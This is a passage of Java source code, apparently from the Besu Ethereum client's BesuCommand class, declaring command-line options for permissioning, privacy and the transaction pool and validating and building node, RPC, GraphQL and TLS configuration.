unlikely to be required (default: ${DEFAULT-VALUE})") private final Boolean pruningEnabled = false; @Option( names = {"--permissions-nodes-config-file-enabled"}, description = "Enable node level permissions (default: ${DEFAULT-VALUE})") private final Boolean permissionsNodesEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. 
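  // File-based node permissioning: the *-enabled flag above turns it on and the
  // option below points at the allowlist TOML, e.g. (illustrative path):
  //   besu --permissions-nodes-config-file-enabled \
  //        --permissions-nodes-config-file=/etc/besu/permissions_config.toml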
@CommandLine.Option( names = {"--permissions-nodes-config-file"}, description = "Node permissioning config TOML file (default: a file named \"permissions_config.toml\" in the Besu data folder)") private String nodePermissionsConfigFile = null; @Option( names = {"--permissions-accounts-config-file-enabled"}, description = "Enable account level permissions (default: ${DEFAULT-VALUE})") private final Boolean permissionsAccountsEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--permissions-accounts-config-file"}, description = "Account permissioning config TOML file (default: a file named \"permissions_config.toml\" in the Besu data folder)") private String accountPermissionsConfigFile = null; @Option( names = {"--permissions-nodes-contract-address"}, description = "Address of the node permissioning smart contract", arity = "1") private final Address permissionsNodesContractAddress = null; @Option( names = {"--permissions-nodes-contract-version"}, description = "Version of the EEA Node Permissioning interface (default: ${DEFAULT-VALUE})") private final Integer permissionsNodesContractVersion = 1; @Option( names = {"--permissions-nodes-contract-enabled"}, description = "Enable node level permissions via smart contract (default: ${DEFAULT-VALUE})") private final Boolean permissionsNodesContractEnabled = false; @Option( names = {"--permissions-accounts-contract-address"}, description = "Address of the account permissioning smart contract", arity = "1") private final Address permissionsAccountsContractAddress = null; @Option( names = {"--permissions-accounts-contract-enabled"}, description = "Enable account level permissions via smart contract (default: ${DEFAULT-VALUE})") private final Boolean permissionsAccountsContractEnabled = false; @Option( names = {"--privacy-enabled"}, description = "Enable private transactions (default: ${DEFAULT-VALUE})") private final Boolean isPrivacyEnabled = false; @Option( names = {"--privacy-multi-tenancy-enabled"}, description = "Enable multi-tenant private transactions (default: ${DEFAULT-VALUE})") private final Boolean isPrivacyMultiTenancyEnabled = false; @Option( names = {"--revert-reason-enabled"}, description = "Enable passing the revert reason back through TransactionReceipts (default: ${DEFAULT-VALUE})") private final Boolean isRevertReasonEnabled = false; @Option( names = {"--required-blocks", "--required-block"}, paramLabel = "BLOCK=HASH", description = "Block number and hash peers are required to have.", arity = "*", split = ",") private final Map<Long, Hash> requiredBlocks = new HashMap<>(); @Option( names = {"--privacy-url"}, description = "The URL on which the enclave is running") private final URI privacyUrl = PrivacyParameters.DEFAULT_ENCLAVE_URL; @Option( names = {"--privacy-public-key-file"}, description = "The enclave's public key file") private final File privacyPublicKeyFile = null; @Option( names = {"--privacy-precompiled-address"}, description = "The address to which the privacy pre-compiled contract will be mapped (default: ${DEFAULT-VALUE})", hidden = true) private final Integer privacyPrecompiledAddress = Address.PRIVACY; @Option( names = {"--privacy-marker-transaction-signing-key-file"}, description = "The name of a file containing the private key used to sign privacy marker transactions. 
If unset, each will be signed with a random key.") private final Path privacyMarkerTransactionSigningKeyPath = null; @Option( names = {"--privacy-enable-database-migration"}, description = "Enable private database metadata migration (default: ${DEFAULT-VALUE})") private final Boolean migratePrivateDatabase = false; @Option( names = {"--privacy-flexible-groups-enabled", "--privacy-onchain-groups-enabled"}, description = "Enable flexible (onchain) privacy groups (default: ${DEFAULT-VALUE})") private final Boolean isFlexiblePrivacyGroupsEnabled = false; @Option( names = {"--target-gas-limit"}, description = "Sets target gas limit per block. If set each block's gas limit will approach this setting over time if the current gas limit is different.") private final Long targetGasLimit = null; @Option( names = {"--tx-pool-max-size"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum number of pending transactions that will be kept in the transaction pool (default: ${DEFAULT-VALUE})", arity = "1") private final Integer txPoolMaxSize = TransactionPoolConfiguration.MAX_PENDING_TRANSACTIONS; @Option( names = {"--tx-pool-hashes-max-size"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum number of pending transaction hashes that will be kept in the transaction pool (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pooledTransactionHashesSize = TransactionPoolConfiguration.MAX_PENDING_TRANSACTIONS_HASHES; @Option( names = {"--tx-pool-retention-hours"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum retention period of pending transactions in hours (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pendingTxRetentionPeriod = TransactionPoolConfiguration.DEFAULT_TX_RETENTION_HOURS; @Option( names = {"--tx-pool-price-bump"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, converter = PercentageConverter.class, description = "Price bump percentage to replace an already existing transaction (default: ${DEFAULT-VALUE})", arity = "1") private final Integer priceBump = TransactionPoolConfiguration.DEFAULT_PRICE_BUMP.getValue(); @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--key-value-storage"}, description = "Identity for the key-value storage to be used.", arity = "1") private String keyValueStorageName = DEFAULT_KEY_VALUE_STORAGE_NAME; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) @Option( names = {"--security-module"}, paramLabel = "<NAME>", description = "Identity for the Security Module to be used.", arity = "1") private String securityModuleName = DEFAULT_SECURITY_MODULE; @Option( names = {"--auto-log-bloom-caching-enabled"}, description = "Enable automatic log bloom caching (default: ${DEFAULT-VALUE})", arity = "1") private final Boolean autoLogBloomCachingEnabled = true; @Option( names = {"--override-genesis-config"}, paramLabel = "NAME=VALUE", description = "Overrides configuration values in the genesis file. 
Use with care.", arity = "*", hidden = true, split = ",") private final Map<String, String> genesisConfigOverrides = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); @Option( names = {"--pruning-blocks-retained"}, defaultValue = "1024", paramLabel = "<INTEGER>", description = "Minimum number of recent blocks for which to keep entire world state (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pruningBlocksRetained = PrunerConfiguration.DEFAULT_PRUNING_BLOCKS_RETAINED; @Option( names = {"--pruning-block-confirmations"}, defaultValue = "10", paramLabel = "<INTEGER>", description = "Minimum number of confirmations on a block before marking begins (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pruningBlockConfirmations = PrunerConfiguration.DEFAULT_PRUNING_BLOCK_CONFIRMATIONS; @CommandLine.Option( names = {"--pid-path"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Path to PID file (optional)") private final Path pidPath = null; @CommandLine.Option( names = {"--api-gas-price-blocks"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Number of blocks to consider for eth_gasPrice (default: ${DEFAULT-VALUE})") private final Long apiGasPriceBlocks = 100L; @CommandLine.Option( names = {"--api-gas-price-percentile"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Percentile value to measure for eth_gasPrice (default: ${DEFAULT-VALUE})") private final Double apiGasPricePercentile = 50.0; @CommandLine.Option( names = {"--api-gas-price-max"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Maximum gas price for eth_gasPrice (default: ${DEFAULT-VALUE})") private final Long apiGasPriceMax = 500_000_000_000L; @Option( names = {"--goquorum-compatibility-enabled"}, hidden = true, description = "Start Besu in GoQuorum compatibility mode (default: ${DEFAULT-VALUE})") private final Boolean isGoQuorumCompatibilityMode = false; @CommandLine.Option( names = {"--static-nodes-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Specifies the static node file containing the static nodes for this node to connect to") private final Path staticNodesFile = null; private EthNetworkConfig ethNetworkConfig; private JsonRpcConfiguration jsonRpcConfiguration; private GraphQLConfiguration graphQLConfiguration; private WebSocketConfiguration webSocketConfiguration; private ApiConfiguration apiConfiguration; private MetricsConfiguration metricsConfiguration; private Optional<PermissioningConfiguration> permissioningConfiguration; private Collection<EnodeURL> staticNodes; private BesuController besuController; private BesuConfiguration pluginCommonConfiguration; private final Supplier<ObservableMetricsSystem> metricsSystem = Suppliers.memoize(() -> MetricsSystemFactory.create(metricsConfiguration())); private Vertx vertx; private EnodeDnsConfiguration enodeDnsConfiguration; private KeyValueStorageProvider keyValueStorageProvider; public BesuCommand( final Logger logger, final Supplier<RlpBlockImporter> rlpBlockImporter, final Function<BesuController, JsonBlockImporter> jsonBlockImporterFactory, final Function<Blockchain, RlpBlockExporter> rlpBlockExporterFactory, final RunnerBuilder runnerBuilder, final BesuController.Builder controllerBuilderFactory, final BesuPluginContextImpl besuPluginContext, final Map<String, String> environment) { this( logger, rlpBlockImporter, jsonBlockImporterFactory, rlpBlockExporterFactory, runnerBuilder, controllerBuilderFactory, besuPluginContext, environment, new StorageServiceImpl(), new SecurityModuleServiceImpl()); } 
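  // Test-visible constructor: identical to the public constructor above except that
  // the StorageServiceImpl and SecurityModuleServiceImpl collaborators are injected,
  // so unit tests can substitute their own instances for the defaults created there.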
@VisibleForTesting protected BesuCommand( final Logger logger, final Supplier<RlpBlockImporter> rlpBlockImporter, final Function<BesuController, JsonBlockImporter> jsonBlockImporterFactory, final Function<Blockchain, RlpBlockExporter> rlpBlockExporterFactory, final RunnerBuilder runnerBuilder, final BesuController.Builder controllerBuilderFactory, final BesuPluginContextImpl besuPluginContext, final Map<String, String> environment, final StorageServiceImpl storageService, final SecurityModuleServiceImpl securityModuleService) { this.logger = logger; this.rlpBlockImporter = rlpBlockImporter; this.rlpBlockExporterFactory = rlpBlockExporterFactory; this.jsonBlockImporterFactory = jsonBlockImporterFactory; this.runnerBuilder = runnerBuilder; this.controllerBuilderFactory = controllerBuilderFactory; this.besuPluginContext = besuPluginContext; this.environment = environment; this.storageService = storageService; this.securityModuleService = securityModuleService; pluginCommonConfiguration = new BesuCommandConfigurationService(); besuPluginContext.addService(BesuConfiguration.class, pluginCommonConfiguration); } public void parse( final AbstractParseResultHandler<List<Object>> resultHandler, final BesuExceptionHandler exceptionHandler, final InputStream in, final String... args) { commandLine = new CommandLine(this, new BesuCommandCustomFactory(besuPluginContext)) .setCaseInsensitiveEnumValuesAllowed(true); enableExperimentalEIPs(); addSubCommands(resultHandler, in); registerConverters(); handleUnstableOptions(); preparePlugins(); parse(resultHandler, exceptionHandler, args); } @Override public void run() { try { configureLogging(true); configureNativeLibs(); logger.info("Starting Besu version: {}", BesuInfo.nodeName(identityString)); // Need to create vertx after cmdline has been parsed, such that metricsSystem is configurable vertx = createVertx(createVertxOptions(metricsSystem.get())); final BesuCommand controller = validateOptions().configure().controller(); preSynchronizationTaskRunner.runTasks(controller.besuController); controller.startPlugins().startSynchronization(); } catch (final Exception e) { throw new ParameterException(this.commandLine, e.getMessage(), e); } } @VisibleForTesting void setBesuConfiguration(final BesuConfiguration pluginCommonConfiguration) { this.pluginCommonConfiguration = pluginCommonConfiguration; } private void enableExperimentalEIPs() { // Usage of static command line flags is strictly reserved for experimental EIPs commandLine.addMixin("experimentalEIPs", ExperimentalEIPs.class); } private void addSubCommands( final AbstractParseResultHandler<List<Object>> resultHandler, final InputStream in) { commandLine.addSubcommand( BlocksSubCommand.COMMAND_NAME, new BlocksSubCommand( rlpBlockImporter, jsonBlockImporterFactory, rlpBlockExporterFactory, resultHandler.out())); commandLine.addSubcommand( PublicKeySubCommand.COMMAND_NAME, new PublicKeySubCommand(resultHandler.out(), this::buildNodeKey)); commandLine.addSubcommand( PasswordSubCommand.COMMAND_NAME, new PasswordSubCommand(resultHandler.out())); commandLine.addSubcommand(RetestethSubCommand.COMMAND_NAME, new RetestethSubCommand()); commandLine.addSubcommand( RLPSubCommand.COMMAND_NAME, new RLPSubCommand(resultHandler.out(), in)); commandLine.addSubcommand( OperatorSubCommand.COMMAND_NAME, new OperatorSubCommand(resultHandler.out())); } private void registerConverters() { commandLine.registerConverter(Address.class, Address::fromHexStringStrict); commandLine.registerConverter(Bytes.class, Bytes::fromHexString); 
commandLine.registerConverter(Level.class, Level::valueOf); commandLine.registerConverter(SyncMode.class, SyncMode::fromString); commandLine.registerConverter(MetricsProtocol.class, MetricsProtocol::fromString); commandLine.registerConverter(UInt256.class, (arg) -> UInt256.valueOf(new BigInteger(arg))); commandLine.registerConverter(Wei.class, (arg) -> Wei.of(Long.parseUnsignedLong(arg))); commandLine.registerConverter(PositiveNumber.class, PositiveNumber::fromString); commandLine.registerConverter(Hash.class, Hash::fromHexString); commandLine.registerConverter(Optional.class, Optional::of); commandLine.registerConverter(Double.class, Double::parseDouble); metricCategoryConverter.addCategories(BesuMetricCategory.class); metricCategoryConverter.addCategories(StandardMetricCategory.class); commandLine.registerConverter(MetricCategory.class, metricCategoryConverter); } private void handleUnstableOptions() { // Add unstable options final ImmutableMap.Builder<String, Object> unstableOptionsBuild = ImmutableMap.builder(); final ImmutableMap<String, Object> unstableOptions = unstableOptionsBuild .put("Ethereum Wire Protocol", unstableEthProtocolOptions) .put("Metrics", unstableMetricsCLIOptions) .put("P2P Network", unstableNetworkingOptions) .put("RPC", unstableRPCOptions) .put("DNS Configuration", unstableDnsOptions) .put("NAT Configuration", unstableNatOptions) .put("Synchronizer", unstableSynchronizerOptions) .put("TransactionPool", unstableTransactionPoolOptions) .put("Ethstats", unstableEthstatsOptions) .put("Mining", unstableMiningOptions) .put("Native Library", unstableNativeLibraryOptions) .put("Data Storage Options", unstableDataStorageOptions) .put("Launcher", unstableLauncherOptions) .build(); UnstableOptionsSubCommand.createUnstableOptions(commandLine, unstableOptions); } private void preparePlugins() { besuPluginContext.addService(PicoCLIOptions.class, new PicoCLIOptionsImpl(commandLine)); besuPluginContext.addService(SecurityModuleService.class, securityModuleService); besuPluginContext.addService(StorageService.class, storageService); besuPluginContext.addService(MetricCategoryRegistry.class, metricCategoryRegistry); // register built-in plugins new RocksDBPlugin().register(besuPluginContext); new InMemoryStoragePlugin().register(besuPluginContext); besuPluginContext.registerPlugins(pluginsDir()); metricCategoryRegistry .getMetricCategories() .forEach(metricCategoryConverter::addRegistryCategory); // register default security module securityModuleService.register( DEFAULT_SECURITY_MODULE, Suppliers.memoize(this::defaultSecurityModule)); } private SecurityModule defaultSecurityModule() { return new KeyPairSecurityModule(loadKeyPair()); } @VisibleForTesting KeyPair loadKeyPair() { return KeyPairUtil.loadKeyPair(nodePrivateKeyFile()); } private void parse( final AbstractParseResultHandler<List<Object>> resultHandler, final BesuExceptionHandler exceptionHandler, final String... args) { // Create a handler that will search for a config file option and use it for // default values // and eventually it will run regular parsing of the remaining options. 
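  // Illustrative --config-file contents (TOML; keys are the long option names
  // without the leading dashes; the values shown are made up):
  //   data-path="/var/lib/besu"
  //   rpc-http-enabled=true
  //   rpc-http-api=["ETH","NET","WEB3"]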
final ConfigOptionSearchAndRunHandler configParsingHandler = new ConfigOptionSearchAndRunHandler( resultHandler, exceptionHandler, CONFIG_FILE_OPTION_NAME, environment); ParseArgsHelper.getLauncherOptions(unstableLauncherOptions, args); if (unstableLauncherOptions.isLauncherMode() || unstableLauncherOptions.isLauncherModeForced()) { try { final ImmutableLauncherConfig launcherConfig = ImmutableLauncherConfig.builder() .launcherScript(BesuCommand.class.getResourceAsStream("launcher.json")) .addCommandClasses( this, unstableNatOptions, unstableEthstatsOptions, unstableMiningOptions) .isLauncherForced(unstableLauncherOptions.isLauncherModeForced()) .build(); final File file = new LauncherManager(launcherConfig).run(); logger.info("Config file location : {}", file.getAbsolutePath()); commandLine.parseWithHandlers( configParsingHandler, exceptionHandler, String.format("%s=%s", CONFIG_FILE_OPTION_NAME, file.getAbsolutePath())); } catch (LauncherException e) { logger.warn("Unable to run the launcher {}", e.getMessage()); } } else { commandLine.parseWithHandlers(configParsingHandler, exceptionHandler, args); } } private void startSynchronization() { synchronize( besuController, p2pEnabled, peerDiscoveryEnabled, ethNetworkConfig, maxPeers, p2pHost, p2pInterface, p2pPort, graphQLConfiguration, jsonRpcConfiguration, webSocketConfiguration, apiConfiguration, metricsConfiguration, permissioningConfiguration, staticNodes, pidPath); } private BesuCommand startPlugins() { besuPluginContext.addService( BesuEvents.class, new BesuEventsImpl( besuController.getProtocolContext().getBlockchain(), besuController.getProtocolManager().getBlockBroadcaster(), besuController.getTransactionPool(), besuController.getSyncState())); besuPluginContext.addService(MetricsSystem.class, getMetricsSystem()); besuController.getAdditionalPluginServices().appendPluginServices(besuPluginContext); besuPluginContext.startPlugins(); return this; } public void configureLogging(final boolean announce) { // To change the configuration if color was enabled/disabled Configurator.reconfigure(); // set log level per CLI flags if (logLevel != null) { if (announce) { System.out.println("Setting logging level to " + logLevel.name()); } Configurator.setAllLevels("", logLevel); } } public static Optional<Boolean> getColorEnabled() { return Optional.ofNullable(colorEnabled); } private void configureNativeLibs() { if (unstableNativeLibraryOptions.getNativeAltbn128()) { AbstractAltBnPrecompiledContract.enableNative(); } if (unstableNativeLibraryOptions.getNativeSecp256k1()) { SignatureAlgorithmFactory.getInstance().enableNative(); } } private BesuCommand validateOptions() { issueOptionWarnings(); validateP2PInterface(p2pInterface); validateMiningParams(); validateNatParams(); validateNetStatsParams(); validateDnsOptionsParams(); return this; } @SuppressWarnings("ConstantConditions") private void validateMiningParams() { if (isMiningEnabled && coinbase == null) { throw new ParameterException( this.commandLine, "Unable to mine without a valid coinbase. Either disable mining (remove --miner-enabled) " + "or specify the beneficiary of mining (via --miner-coinbase <Address>)"); } if (!isMiningEnabled && iStratumMiningEnabled) { throw new ParameterException( this.commandLine, "Unable to mine with Stratum if mining is disabled. 
Either disable Stratum mining (remove --miner-stratum-enabled) " + "or specify mining is enabled (--miner-enabled)"); } } protected void validateP2PInterface(final String p2pInterface) { final String failMessage = "The provided --p2p-interface is not available: " + p2pInterface; try { if (!NetworkUtility.isNetworkInterfaceAvailable(p2pInterface)) { throw new ParameterException(commandLine, failMessage); } } catch (final UnknownHostException | SocketException e) { throw new ParameterException(commandLine, failMessage, e); } } @SuppressWarnings("ConstantConditions") private void validateNatParams() { if (!(natMethod.equals(NatMethod.AUTO) || natMethod.equals(NatMethod.KUBERNETES)) && !unstableNatOptions .getNatManagerServiceName() .equals(DEFAULT_BESU_SERVICE_NAME_FILTER)) { throw new ParameterException( this.commandLine, "The `--Xnat-kube-service-name` parameter is only used in kubernetes mode. Either remove --Xnat-kube-service-name" + " or select the KUBERNETES mode (via --nat--method=KUBERNETES)"); } if (natMethod.equals(NatMethod.AUTO) && !unstableNatOptions.getNatMethodFallbackEnabled()) { throw new ParameterException( this.commandLine, "The `--Xnat-method-fallback-enabled` parameter cannot be used in AUTO mode. Either remove --Xnat-method-fallback-enabled" + " or select another mode (via --nat--method=XXXX)"); } } private void validateNetStatsParams() { if (Strings.isNullOrEmpty(unstableEthstatsOptions.getEthstatsUrl()) && !unstableEthstatsOptions.getEthstatsContact().isEmpty()) { throw new ParameterException( this.commandLine, "The `--Xethstats-contact` requires ethstats server URL to be provided. Either remove --Xethstats-contact" + " or provide an url (via --Xethstats=nodename:secret@host:port)"); } } private void validateDnsOptionsParams() { if (!unstableDnsOptions.getDnsEnabled() && unstableDnsOptions.getDnsUpdateEnabled()) { throw new ParameterException( this.commandLine, "The `--Xdns-update-enabled` requires dns to be enabled. 
Either remove --Xdns-update-enabled" + " or specify dns is enabled (--Xdns-enabled)"); } } private GenesisConfigOptions readGenesisConfigOptions() { final GenesisConfigOptions genesisConfigOptions; try { final GenesisConfigFile genesisConfigFile = GenesisConfigFile.fromConfig(genesisConfig()); genesisConfigOptions = genesisConfigFile.getConfigOptions(genesisConfigOverrides); } catch (final Exception e) { throw new IllegalStateException("Unable to read genesis file for GoQuorum options", e); } return genesisConfigOptions; } private void issueOptionWarnings() { // Check that P2P options are able to work CommandLineUtils.checkOptionDependencies( logger, commandLine, "--p2p-enabled", !p2pEnabled, asList( "--bootnodes", "--discovery-enabled", "--max-peers", "--banned-node-id", "--banned-node-ids", "--p2p-host", "--p2p-interface", "--p2p-port", "--remote-connections-max-percentage")); // Check that mining options are able to work CommandLineUtils.checkOptionDependencies( logger, commandLine, "--miner-enabled", !isMiningEnabled, asList( "--miner-coinbase", "--min-block-occupancy-ratio", "--miner-extra-data", "--miner-stratum-enabled", "--Xminer-remote-sealers-limit", "--Xminer-remote-sealers-hashrate-ttl")); CommandLineUtils.checkMultiOptionDependencies( logger, commandLine, List.of("--miner-enabled", "--goquorum-compatibility-enabled"), List.of(!isMiningEnabled, !isGoQuorumCompatibilityMode), singletonList("--min-gas-price")); CommandLineUtils.checkOptionDependencies( logger, commandLine, "--sync-mode", !SyncMode.FAST.equals(syncMode), singletonList("--fast-sync-min-peers")); if (!securityModuleName.equals(DEFAULT_SECURITY_MODULE) && nodePrivateKeyFile != null) { logger.warn( DEPENDENCY_WARNING_MSG, "--node-private-key-file", "--security-module=" + DEFAULT_SECURITY_MODULE); } } private BesuCommand configure() throws Exception { checkPortClash(); syncMode = Optional.ofNullable(syncMode) .orElse( genesisFile == null && !isPrivacyEnabled && network != NetworkName.DEV ? SyncMode.FAST : SyncMode.FULL); ethNetworkConfig = updateNetworkConfig(getNetwork()); checkGoQuorumGenesisConfig(); checkGoQuorumCompatibilityConfig(ethNetworkConfig); jsonRpcConfiguration = jsonRpcConfiguration(); graphQLConfiguration = graphQLConfiguration(); webSocketConfiguration = webSocketConfiguration(); apiConfiguration = apiConfiguration(); // hostsWhitelist is a hidden option. 
If it is specified, add the list to hostAllowlist if (!hostsWhitelist.isEmpty()) { // if allowlist == default values, remove the default values if (hostsAllowlist.size() == 2 && hostsAllowlist.containsAll(List.of("localhost", "127.0.0.1"))) { hostsAllowlist.removeAll(List.of("localhost", "127.0.0.1")); } hostsAllowlist.addAll(hostsWhitelist); } permissioningConfiguration = permissioningConfiguration(); staticNodes = loadStaticNodes(); logger.info("Connecting to {} static nodes.", staticNodes.size()); logger.trace("Static Nodes = {}", staticNodes); final List<EnodeURL> enodeURIs = ethNetworkConfig.getBootNodes(); permissioningConfiguration .flatMap(PermissioningConfiguration::getLocalConfig) .ifPresent(p -> ensureAllNodesAreInAllowlist(enodeURIs, p)); permissioningConfiguration .flatMap(PermissioningConfiguration::getLocalConfig) .ifPresent(p -> ensureAllNodesAreInAllowlist(staticNodes, p)); metricsConfiguration = metricsConfiguration(); logger.info("Security Module: {}", securityModuleName); instantiateSignatureAlgorithmFactory(); return this; } private GoQuorumPrivacyParameters configureGoQuorumPrivacy( final KeyValueStorageProvider storageProvider) { return new GoQuorumPrivacyParameters( createGoQuorumEnclave(), readEnclaveKey(), storageProvider.createGoQuorumPrivateStorage(), createPrivateWorldStateArchive(storageProvider)); } private GoQuorumEnclave createGoQuorumEnclave() { final EnclaveFactory enclaveFactory = new EnclaveFactory(Vertx.vertx()); if (privacyKeyStoreFile != null) { return enclaveFactory.createGoQuorumEnclave( privacyUrl, privacyKeyStoreFile, privacyKeyStorePasswordFile, privacyTlsKnownEnclaveFile); } else { return enclaveFactory.createGoQuorumEnclave(privacyUrl); } } private String readEnclaveKey() { final String key; try { key = Files.asCharSource(privacyPublicKeyFile, UTF_8).read(); } catch (final Exception e) { throw new ParameterException( this.commandLine, "--privacy-public-key-file must be set when --goquorum-compatibility-enabled is set to true.", e); } if (key.length() != 44) { throw new IllegalArgumentException( "Contents of enclave public key file needs to be 44 characters long to decode to a valid 32 byte public key."); } // throws exception if invalid base 64 Base64.getDecoder().decode(key); return key; } private NetworkName getNetwork() { // noinspection ConstantConditions network is not always null but injected by // PicoCLI if used return network == null ? 
MAINNET : network; } private void ensureAllNodesAreInAllowlist( final Collection<EnodeURL> enodeAddresses, final LocalPermissioningConfiguration permissioningConfiguration) { try { PermissioningConfigurationValidator.areAllNodesAreInAllowlist( enodeAddresses, permissioningConfiguration); } catch (final Exception e) { throw new ParameterException(this.commandLine, e.getMessage()); } } private BesuCommand controller() { besuController = buildController(); return this; } public BesuController buildController() { try { return getControllerBuilder().build(); } catch (final Exception e) { throw new ExecutionException(this.commandLine, e.getMessage(), e); } } public BesuControllerBuilder getControllerBuilder() { final KeyValueStorageProvider storageProvider = keyValueStorageProvider(keyValueStorageName); return controllerBuilderFactory .fromEthNetworkConfig(updateNetworkConfig(getNetwork()), genesisConfigOverrides) .synchronizerConfiguration(buildSyncConfig()) .ethProtocolConfiguration(unstableEthProtocolOptions.toDomainObject()) .dataDirectory(dataDir()) .miningParameters( new MiningParameters( coinbase, minTransactionGasPrice, extraData, isMiningEnabled, iStratumMiningEnabled, stratumNetworkInterface, stratumPort, unstableMiningOptions.getStratumExtranonce(), Optional.empty(), minBlockOccupancyRatio, unstableMiningOptions.getRemoteSealersLimit(), unstableMiningOptions.getRemoteSealersTimeToLive())) .transactionPoolConfiguration(buildTransactionPoolConfiguration()) .nodeKey(buildNodeKey()) .metricsSystem(metricsSystem.get()) .privacyParameters(privacyParameters(storageProvider)) .clock(Clock.systemUTC()) .isRevertReasonEnabled(isRevertReasonEnabled) .storageProvider(storageProvider) .isPruningEnabled(isPruningEnabled()) .pruningConfiguration( new PrunerConfiguration(pruningBlockConfirmations, pruningBlocksRetained)) .genesisConfigOverrides(genesisConfigOverrides) .gasLimitCalculator( Optional.ofNullable(targetGasLimit) .<GasLimitCalculator>map(TargetingGasLimitCalculator::new) .orElse(GasLimitCalculator.constant())) .requiredBlocks(requiredBlocks) .reorgLoggingThreshold(reorgLoggingThreshold) .dataStorageConfiguration(unstableDataStorageOptions.toDomainObject()); } private GraphQLConfiguration graphQLConfiguration() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--graphql-http-enabled", !isGraphQLHttpEnabled, asList("--graphql-http-cors-origins", "--graphql-http-host", "--graphql-http-port")); final GraphQLConfiguration graphQLConfiguration = GraphQLConfiguration.createDefault(); graphQLConfiguration.setEnabled(isGraphQLHttpEnabled); graphQLConfiguration.setHost(graphQLHttpHost); graphQLConfiguration.setPort(graphQLHttpPort); graphQLConfiguration.setHostsAllowlist(hostsAllowlist); graphQLConfiguration.setCorsAllowedDomains(graphQLHttpCorsAllowedOrigins); graphQLConfiguration.setHttpTimeoutSec(unstableRPCOptions.getHttpTimeoutSec()); return graphQLConfiguration; } private JsonRpcConfiguration jsonRpcConfiguration() { checkRpcTlsClientAuthOptionsDependencies(); checkRpcTlsOptionsDependencies(); checkRpcHttpOptionsDependencies(); if (isRpcHttpAuthenticationEnabled && rpcHttpAuthenticationCredentialsFile() == null && rpcHttpAuthenticationPublicKeyFile == null) { throw new ParameterException( commandLine, "Unable to authenticate JSON-RPC HTTP endpoint without a supplied credentials file or authentication public key file"); } final JsonRpcConfiguration jsonRpcConfiguration = JsonRpcConfiguration.createDefault(); jsonRpcConfiguration.setEnabled(isRpcHttpEnabled); 
jsonRpcConfiguration.setHost(rpcHttpHost); jsonRpcConfiguration.setPort(rpcHttpPort); jsonRpcConfiguration.setMaxActiveConnections(rpcHttpMaxConnections); jsonRpcConfiguration.setCorsAllowedDomains(rpcHttpCorsAllowedOrigins); jsonRpcConfiguration.setRpcApis(rpcHttpApis.stream().distinct().collect(Collectors.toList())); jsonRpcConfiguration.setHostsAllowlist(hostsAllowlist); jsonRpcConfiguration.setAuthenticationEnabled(isRpcHttpAuthenticationEnabled); jsonRpcConfiguration.setAuthenticationCredentialsFile(rpcHttpAuthenticationCredentialsFile()); jsonRpcConfiguration.setAuthenticationPublicKeyFile(rpcHttpAuthenticationPublicKeyFile); jsonRpcConfiguration.setTlsConfiguration(rpcHttpTlsConfiguration()); jsonRpcConfiguration.setHttpTimeoutSec(unstableRPCOptions.getHttpTimeoutSec()); return jsonRpcConfiguration; } private void checkRpcHttpOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-http-enabled", !isRpcHttpEnabled, asList( "--rpc-http-api", "--rpc-http-apis", "--rpc-http-cors-origins", "--rpc-http-host", "--rpc-http-port", "--rpc-http-max-active-connections", "--rpc-http-authentication-enabled", "--rpc-http-authentication-credentials-file", "--rpc-http-authentication-public-key-file", "--rpc-http-tls-enabled", "--rpc-http-tls-keystore-file", "--rpc-http-tls-keystore-password-file", "--rpc-http-tls-client-auth-enabled", "--rpc-http-tls-known-clients-file", "--rpc-http-tls-ca-clients-enabled")); } private void checkRpcTlsOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-http-tls-enabled", !isRpcHttpTlsEnabled, asList( "--rpc-http-tls-keystore-file", "--rpc-http-tls-keystore-password-file", "--rpc-http-tls-client-auth-enabled", "--rpc-http-tls-known-clients-file", "--rpc-http-tls-ca-clients-enabled")); } private void checkRpcTlsClientAuthOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-http-tls-client-auth-enabled", !isRpcHttpTlsClientAuthEnabled, asList("--rpc-http-tls-known-clients-file", "--rpc-http-tls-ca-clients-enabled")); } private void checkPrivacyTlsOptionsDependencies() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--privacy-tls-enabled", !isPrivacyTlsEnabled, asList( "--privacy-tls-keystore-file", "--privacy-tls-keystore-password-file", "--privacy-tls-known-enclave-file")); } private Optional<TlsConfiguration> rpcHttpTlsConfiguration() { if (!isRpcTlsConfigurationRequired()) { return Optional.empty(); } if (rpcHttpTlsKeyStoreFile == null) { throw new ParameterException( commandLine, "Keystore file is required when TLS is enabled for JSON-RPC HTTP endpoint"); } if (rpcHttpTlsKeyStorePasswordFile == null) { throw new ParameterException( commandLine, "File containing password to unlock keystore is required when TLS is enabled for JSON-RPC HTTP endpoint"); } if (isRpcHttpTlsClientAuthEnabled && !isRpcHttpTlsCAClientsEnabled && rpcHttpTlsKnownClientsFile == null) { throw new ParameterException( commandLine, "Known-clients file must be specified or CA clients must be enabled when TLS client authentication is enabled for JSON-RPC HTTP endpoint"); } return Optional.of( TlsConfiguration.Builder.aTlsConfiguration() 